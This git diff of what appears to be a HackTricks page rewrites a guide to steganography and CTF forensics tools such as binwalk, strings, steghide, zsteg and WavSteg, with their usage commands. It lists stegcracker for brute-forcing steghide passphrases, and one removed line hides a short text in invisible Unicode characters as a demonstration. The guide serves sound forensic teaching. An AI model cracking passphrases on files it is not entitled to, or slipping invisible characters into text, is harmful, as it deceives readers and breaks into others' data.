file you have - -### Strings - -Extract strings from the file.\ -Useful commands:\ -`strings -n 6 file`: Extract the strings with min length of 6\ -`strings -n 6 file | head -n 20`: Extract first 20 strings with min length of 6\ -`strings -n 6 file | tail -n 20`: Extract last 20 strings with min length of 6\ -`strings -e s -n 6 file`: Extract 7bit strings\ -`strings -e S -n 6 file`: Extract 8bit strings\ -`strings -e l -n 6 file`: Extract 16bit strings (little-endian)\ -`strings -e b -n 6 file`: Extract 16bit strings (big-endian)\ -`strings -e L -n 6 file`: Extract 32bit strings (little-endian)\ -`strings -e B -n 6 file`: Extract 32bit strings (big-endian) - -### cmp - Comparison - -If you have some **modified** image/audio/video, check if you can **find the exact original one** on the internet, then **compare both** files with: +## **Extracting Data from Files** +### **Binwalk** +A tool for searching binary files for embedded hidden files and data. It's installed via `apt` and its source is available on [GitHub](https://github.com/ReFirmLabs/binwalk). +```bash +binwalk file # Displays the embedded data +binwalk -e file # Extracts the data +binwalk --dd ".*" file # Extracts all data ``` + +### **Foremost** +Recovers files based on their headers and footers, useful for png images. Installed via `apt` with its source on [GitHub](https://github.com/korczis/foremost). +```bash +foremost -i file # Extracts data +``` + +### **Exiftool** +Helps to view file metadata, available [here](https://www.sno.phy.queensu.ca/~phil/exiftool/). +```bash +exiftool file # Shows the metadata +``` + +### **Exiv2** +Similar to exiftool, for metadata viewing. Installable via `apt`, source on [GitHub](https://github.com/Exiv2/exiv2), and has an [official website](http://www.exiv2.org/). +```bash +exiv2 file # Shows the metadata +``` + +### **File** +Identify the type of file you're dealing with. + +### **Strings** +Extracts readable strings from files, using various encoding settings to filter the output. +```bash +strings -n 6 file # Extracts strings with a minimum length of 6 +strings -n 6 file | head -n 20 # First 20 strings +strings -n 6 file | tail -n 20 # Last 20 strings +strings -e s -n 6 file # 7bit strings +strings -e S -n 6 file # 8bit strings +strings -e l -n 6 file # 16bit strings (little-endian) +strings -e b -n 6 file # 16bit strings (big-endian) +strings -e L -n 6 file # 32bit strings (little-endian) +strings -e B -n 6 file # 32bit strings (big-endian) +``` + +### **Comparison (cmp)** +Useful for comparing a modified file with its original version found online. +```bash cmp original.jpg stego.jpg -b -l ``` -## Extracting hidden data in text +## **Extracting Hidden Data in Text** -### Hidden data in spaces +### **Hidden Data in Spaces** +Invisible characters in seemingly empty spaces may hide information. To extract this data, visit [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder). -If you find that a **text line** is **bigger** than it should be, then some **hidden information** could be included inside the **spaces** using invisible characters.󐁈󐁥󐁬󐁬󐁯󐀠󐁴󐁨\ -To **extract** the **data**, you can use: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder) + + +***
@@ -96,131 +90,135 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Extracting data from images +*** -### identify +## **Extracting Data from Images** -[GraphicMagick](https://imagemagick.org/script/download.php) tool to check what kind of image a file is. Also checks if the image is corrupted. +### **Identifying Image Details with GraphicMagick** -``` +[GraphicMagick](https://imagemagick.org/script/download.php) serves to determine image file types and identify potential corruption. Execute the command below to inspect an image: + +```bash ./magick identify -verbose stego.jpg ``` -If the image is damaged, you may be able to restore it by simply adding a metadata comment to it (if it's very badly damaged this won't work): +To attempt repair on a damaged image, adding a metadata comment might help: ```bash ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg ``` -### Steghide \[JPEG, BMP, WAV, AU] +### **Steghide for Data Concealment** -Steghide is a steganography program that hides data in various kinds of image and audio files. It supports the following file formats : `JPEG, BMP, WAV and AU`. It’s also useful for extracting embedded and encrypted data from other files.\ -It can be installed with `apt`, and the [source](https://github.com/StefanoDeVuono/steghide) can be found on Github.\ -**Useful commands:**\ -`steghide info file` : displays info about whether a file has embedded data or not.\ -`steghide extract -sf file [--passphrase password]` : extracts embedded data from a file \[using a password] +Steghide facilitates hiding data within `JPEG, BMP, WAV, and AU` files, capable of embedding and extracting encrypted data. Installation is straightforward using `apt`, and its [source code is available on GitHub](https://github.com/StefanoDeVuono/steghide). -You can also extract content from steghide using the web: [https://futureboy.us/stegano/decinput.html](https://futureboy.us/stegano/decinput.html) +**Commands:** +- `steghide info file` reveals if a file contains hidden data. +- `steghide extract -sf file [--passphrase password]` extracts the hidden data, password optional. -**Bruteforcing** Steghide: [stegcracker](https://github.com/Paradoxis/StegCracker.git) `stegcracker []` +For web-based extraction, visit [this website](https://futureboy.us/stegano/decinput.html). -### Zsteg \[PNG, BMP] - -zsteg is a tool that can detect hidden data in png and bmp files.\ -To install it : `gem install zsteg`. The source can also be found on [Github](https://github.com/zed-0xff/zsteg)\ -**Useful commands:**\ -`zsteg -a file` : Runs every detection method on the given file\ -`zsteg -E file` : Extracts data with the given payload (example : zsteg -E b4,bgr,msb,xy name.png) - -### stegoVeritas JPG, PNG, GIF, TIFF, BMP - -Capable of a wide variety of simple and advanced tricks, this tool can check file metadata, create transformed images, brute force LSB, and more. Check out `stegoveritas.py -h` to read about its full capabilities. Execute `stegoveritas.py stego.jpg` to run all checks. - -### Stegsolve - -Sometimes there is a message or a text hidden in the image itself that, in order to view it, must have color filters applied, or some color levels changed. Although you can do that with something like GIMP or Photoshop, Stegsolve makes it easier. It's a small Java tool that applies many useful color filters on images; In CTF challenges, Stegsolve is often a real timesaver.\ -You can get it from [Github](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)\ -To use it, just open the image and click on the `<` `>` buttons. - -### FFT - -To find hidden content using Fast Fourier T: - -* [http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/) -* [https://www.ejectamenta.com/Fourifier-fullscreen/](https://www.ejectamenta.com/Fourifier-fullscreen/) -* [https://github.com/0xcomposure/FFTStegPic](https://github.com/0xcomposure/FFTStegPic) -* `pip3 install opencv-python` - -### Stegpy \[PNG, BMP, GIF, WebP, WAV] - -A program for encoding information in image and audio files through steganography. It can store the data as either plaintext or encrypted.\ -Find it on [Github](https://github.com/dhsdshdhk/stegpy). - -### Pngcheck - -Get details on a PNG file (or even find out it's actually something else!).\ -`apt-get install pngcheck`: Install the tool\ -`pngcheck stego.png` : Obtain info about the PNG - -### Some other image tools worth mentioning - -* [http://magiceye.ecksdee.co.uk/](http://magiceye.ecksdee.co.uk/) -* [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/) -* [https://github.com/resurrecting-open-source-projects/outguess](https://github.com/resurrecting-open-source-projects/outguess) -* [https://www.openstego.com/](https://www.openstego.com/) -* [https://diit.sourceforge.net/](https://diit.sourceforge.net/) - -## Extracting data from audios - -### [Steghide \[JPEG, BMP, WAV, AU\]](stego-tricks.md#steghide) - -### [Stegpy \[PNG, BMP, GIF, WebP, WAV\]](stego-tricks.md#stegpy-png-bmp-gif-webp-wav) - -### ffmpeg - -ffmpeg can be used to check the integrity of audio files, reporting various information about the file, as well as any errors it finds.\ -`ffmpeg -v info -i stego.mp3 -f null -` - -### Wavsteg \[WAV] - -WavSteg is a Python3 tool that can hide data, using least significant bit, in wav files. It can also search for, and extract, data from wav files.\ -You can get it from [Github](https://github.com/ragibson/Steganography#WavSteg)\ -Useful commands:\ -`python3 WavSteg.py -r -b 1 -s soundfile -o outputfile` : Extracts to an output file (taking only 1 lsb)\ -`python3 WavSteg.py -r -b 2 -s soundfile -o outputfile` : Extracts to an output file (taking only 2 lsb) - -### Deepsound - -Hide, and check for, information encrypted with AES-265 in sound files. Download from [the oficial page](http://jpinsoft.net/deepsound/download.aspx).\ -To search for hidden info, simply run the program and open the sound file. If DeepSound finds any data hidden, you'll need to provide the password to unlock it. - -### Sonic visualizer - -Sonic visualizer is a tool for viewing and analyzing the contents of audio files. It can be very helpful when facing audio steganography challenges; you can reveal hidden shapes in audio files that many other tools won't detect.\ -If you're stuck, always check the spectrogram of the audio. [Offical Website](https://www.sonicvisualiser.org/) - -### DTMF Tones - Dial tones - -* [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/) -* [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html) - -## Other tricks - -### Binary length SQRT - QR Code - -If you receive binary data with an SQRT length of an entire number, it could be some kind of QR code: +**Bruteforce Attack with Stegcracker:** +- To attempt password cracking on Steghide, use [stegcracker](https://github.com/Paradoxis/StegCracker.git) as follows: +```bash +stegcracker [] ``` + +### **zsteg for PNG and BMP Files** + +zsteg specializes in uncovering hidden data in PNG and BMP files. Installation is done via `gem install zsteg`, with its [source on GitHub](https://github.com/zed-0xff/zsteg). + +**Commands:** +- `zsteg -a file` applies all detection methods on a file. +- `zsteg -E file` specifies a payload for data extraction. + +### **StegoVeritas and Stegsolve** + +**stegoVeritas** checks metadata, performs image transformations, and applies LSB brute forcing among other features. Use `stegoveritas.py -h` for a full list of options and `stegoveritas.py stego.jpg` to execute all checks. + +**Stegsolve** applies various color filters to reveal hidden texts or messages within images. It's available on [GitHub](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve). + +### **FFT for Hidden Content Detection** + +Fast Fourier Transform (FFT) techniques can unveil concealed content in images. Useful resources include: + +- [EPFL Demo](http://bigwww.epfl.ch/demo/ip/demos/FFT/) +- [Ejectamenta](https://www.ejectamenta.com/Fourifier-fullscreen/) +- [FFTStegPic on GitHub](https://github.com/0xcomposure/FFTStegPic) + +### **Stegpy for Audio and Image Files** + +Stegpy allows embedding information into image and audio files, supporting formats like PNG, BMP, GIF, WebP, and WAV. It's available on [GitHub](https://github.com/dhsdshdhk/stegpy). + +### **Pngcheck for PNG File Analysis** + +To analyze PNG files or to validate their authenticity, use: + +```bash +apt-get install pngcheck +pngcheck stego.png +``` + +### **Additional Tools for Image Analysis** + +For further exploration, consider visiting: + +- [Magic Eye Solver](http://magiceye.ecksdee.co.uk/) +- [Image Error Level Analysis](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/) +- [Outguess](https://github.com/resurrecting-open-source-projects/outguess) +- [OpenStego](https://www.openstego.com/) +- [DIIT](https://diit.sourceforge.net/) + +## **Extracting Data from Audios** + +**Audio steganography** offers a unique method to conceal information within sound files. Different tools are utilized for embedding or retrieving hidden content. + +### **Steghide (JPEG, BMP, WAV, AU)** +Steghide is a versatile tool designed for hiding data in JPEG, BMP, WAV, and AU files. Detailed instructions are provided in the [stego tricks documentation](stego-tricks.md#steghide). + +### **Stegpy (PNG, BMP, GIF, WebP, WAV)** +This tool is compatible with a variety of formats including PNG, BMP, GIF, WebP, and WAV. For more information, refer to [Stegpy's section](stego-tricks.md#stegpy-png-bmp-gif-webp-wav). + +### **ffmpeg** +ffmpeg is crucial for assessing the integrity of audio files, highlighting detailed information and pinpointing any discrepancies. +```bash +ffmpeg -v info -i stego.mp3 -f null - +``` + +### **WavSteg (WAV)** +WavSteg excels in concealing and extracting data within WAV files using the least significant bit strategy. It is accessible on [GitHub](https://github.com/ragibson/Steganography#WavSteg). Commands include: +```bash +python3 WavSteg.py -r -b 1 -s soundfile -o outputfile + +python3 WavSteg.py -r -b 2 -s soundfile -o outputfile +``` + +### **Deepsound** +Deepsound allows for the encryption and detection of information within sound files using AES-256. It can be downloaded from [the official page](http://jpinsoft.net/deepsound/download.aspx). + +### **Sonic Visualizer** +An invaluable tool for visual and analytical inspection of audio files, Sonic Visualizer can unveil hidden elements undetectable by other means. Visit the [official website](https://www.sonicvisualiser.org/) for more. + +### **DTMF Tones - Dial Tones** +Detecting DTMF tones in audio files can be achieved through online tools such as [this DTMF detector](https://unframework.github.io/dtmf-detect/) and [DialABC](http://dialabc.com/sound/detect/index.html). + +## **Other Techniques** + +### **Binary Length SQRT - QR Code** +Binary data that squares to a whole number might represent a QR code. Use this snippet to check: +```python import math math.sqrt(2500) #50 ``` +For binary to image conversion, check [dcode](https://www.dcode.fr/binary-image). To read QR codes, use [this online barcode reader](https://online-barcode-reader.inliteresearch.com/). + +### **Braille Translation** +For translating Braille, the [Branah Braille Translator](https://www.branah.com/braille-translator) is an excellent resource. + -To convert binary "1"s and "0"s to a proper image: [https://www.dcode.fr/binary-image](https://github.com/carlospolop/hacktricks/tree/32fa51552498a17d266ff03e62dfd1e2a61dcd10/binary-image/README.md)\ -To read a QR code: [https://online-barcode-reader.inliteresearch.com/](https://online-barcode-reader.inliteresearch.com/) -### Braile -[https://www.branah.com/braille-translator](https://www.branah.com/braille-translator\)) ## **References**